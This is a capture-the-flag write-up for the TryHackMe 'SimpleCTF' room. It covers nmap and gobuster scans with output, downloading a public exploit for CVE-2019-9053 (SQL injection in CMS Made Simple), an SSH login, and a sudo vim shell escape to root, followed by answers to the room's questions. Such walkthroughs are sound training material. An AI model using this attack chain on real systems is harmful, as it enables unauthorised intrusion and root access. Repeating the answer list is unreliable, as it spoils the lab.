TryHackMe - SimpleCTF

Nmap

┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -Pn -p- 10.10.61.2   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 09:12 EDT
Nmap scan report for 10.10.61.2
Host is up (0.22s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.13.22.56
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (90%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 333.81 seconds

Gobuster

┌──(root💀kali)-[~]
└─# gobuster dir -u http://10.10.61.2/ --wildcard -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.61.2/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/05/08 09:30:20 Starting gobuster in directory enumeration mode
===============================================================
/simple               (Status: 301) [Size: 309] [--> http://10.10.61.2/simple/]
  • /simple is a CMS Made Simple install whose version has a public CVE (CVE-2019-9053, a time-based blind SQL injection). We can try the public exploit for it.

  • Pull the exploit onto Kali with wget https://www.exploit-db.com/download/46635 and read the script before running it.

  • Once we have credentials, it is also worth checking whether they are reused for SSH. Remember to specify the port in the ssh command, since SSH is on 2222 rather than the default 22.

  • ssh mitch@10.10.104.30 -p 2222 (the target IP changed between sessions, so use the current one)

Privesc

  • sudo -l shows that vim may be run as root.

  • The usual vim escape is sudo vim -c ':!/bin/sh'; running it as sudo vim -c ':!/bin/bash' starts vim as root and immediately executes /bin/bash from it, which drops us into a root bash shell.

Questions

  • How many services are running under port 1000? Answer 2

  • What is running on the higher port? Answer ssh

  • What's the CVE you're using against the application? Answer CVE-2019-9053. Reading the exploit shows that the application is vulnerable to a time-based blind SQL injection.

  • To what kind of vulnerability is the application vulnerable? Answer SQLi

  • What's the password? I will let you find this on your own

  • Where can you login with the details obtained? Answer ssh

  • What's the user flag? I will let you find this on your own. Hint: cat user.txt

  • Is there any other user in the home directory? What's its name? We run ls /home and find the user sunbath.

  • What can you leverage to spawn a privileged shell? Answer vim

  • What's the root flag? I will let you find this on your own. Hint: cat /root/root.txt
